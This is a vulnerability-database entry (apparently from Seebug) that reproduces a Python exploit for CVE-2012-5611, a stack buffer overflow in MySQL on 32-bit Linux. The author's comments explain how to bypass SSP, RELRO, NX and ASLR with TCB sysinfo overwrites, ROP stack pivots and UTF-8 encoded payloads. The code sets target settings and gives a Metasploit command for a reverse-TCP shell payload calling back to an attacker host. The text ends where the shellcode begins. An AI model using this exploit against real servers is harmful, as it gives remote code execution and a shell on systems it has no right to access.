MySQL Stack Buffer Overflow Linux x86 32bits (bypass SSP/RELRO/NX/ASLR)

2012-12-28T00:00:00
ID SSV:60545
Type seebug
Reporter Root
Modified 2012-12-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# 27/12/12 - status : public release

# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
# -------- Author   : ipv
# -------- Impact   : high
# -------- URL		: http://blog.ring0.me/
# -------- Description
#
# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
# MySQL server is prone to a remote buffer overflow that 
# allow remote authenticated attacker to reach code execution in the 
# context of the user running MySQL instance (default: mysql user).

# The vulnerability resides in acl_get function, called when authenticated
# user  requests a privileged Account Managment statement. MySQL fails 
# to verify user controlled data len of "db" parameter.
#
# 	end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
# The destination address of strcpy is located on a mmaped page dedicated to 
# user connection which allow a buffer overflow on adjacent memory.
#
# Differents attacks vector may be possiblea according the system.
# FYI Microsoft Windows versions are as well vulnerables.
#---------------------------------------------------------
# To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
# I take profit of Threading-Model. This means MySQL use only one address 
# space for all MySQL ressources (data structures, network managment, 
# session, etc.). 
# To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of 
# TCB structure located more higher on the stack. 
# ROP chains aims to pivot to our controlled stack data. At this point, 
# if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT 
# deferencing technique since libc API relies on the sysinfo pointer 
# to call sysenter.
#
# So to accomplish code exec, afaik, you have two way : 
#	1 - Extract sysinfo of an intact TCB and use it as proxy call
#	(or you can restore the first sysinfo after doing modification on got)
#		-> i use it for redhat exploit (no SSP on redhat/centos); 
#		-> this allow us to bypass relro/alsr/nx
#		relro.
#	2 - Find a int0x80 / sysenter gadget in .text ;
#	(Bad instruction follow int0x80 gadget, you have a one shooter to get
#	code exec). So, i advise you to find a sysenter)
#		- i use sysenter for ubuntu 10.04 self-compiled with SSP. 
#		- this allow us bypass relro/ssp/alsr/nx
# 
# Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass
# SSP/ASLR/NX.
#
#---------------------------------------------------------
# UTF-8 and ROP chains limitation :
#---------------------------------------------------------
# Mysql Schema Object Name restricts database name to be alpha numeric 
# (and $ _).
# To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is 
# done via MySQL when databasename is quoted with `` (mandatory to 
# successful exploit target). Yes the devil is in the details.

# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net

########################################################################
# Modules
#

import pymysql
import sys
import struct
import os, socket

########################################################################
# Authentication options 
#

MYSQL_USER = "test"
MYSQL_PASSWORD = ""

#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306

########################################################################
# Helper
# 

def _x(v):
	if isinstance(v, str):
		return v
	return struct.pack("<I", v)

# TCP is used when we face to SSP
class _TCB:
	tcb = 0 # updated later by a ret gadget
	dtv = "BBBB"
	_self = "CCCC"
	multiple_threads= "DDDD"
	sysinfo = 0 # SEIP - updated later by stack pivot gadget 
	stack_guard = "AAAA"
	pointer_guard = 0 # updated later by a pop pop ret gadget

# base class
class rc_base:
	eip_off = 0
	align_payload = 0
	align_stack = 2048
	retsled = ""
	safe_overwrite = ""
	pivot = ""
	pppr = ""
	ppr = ""
	
	# ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
	# XXX - CHANGEME !
	sc_rev_tcp =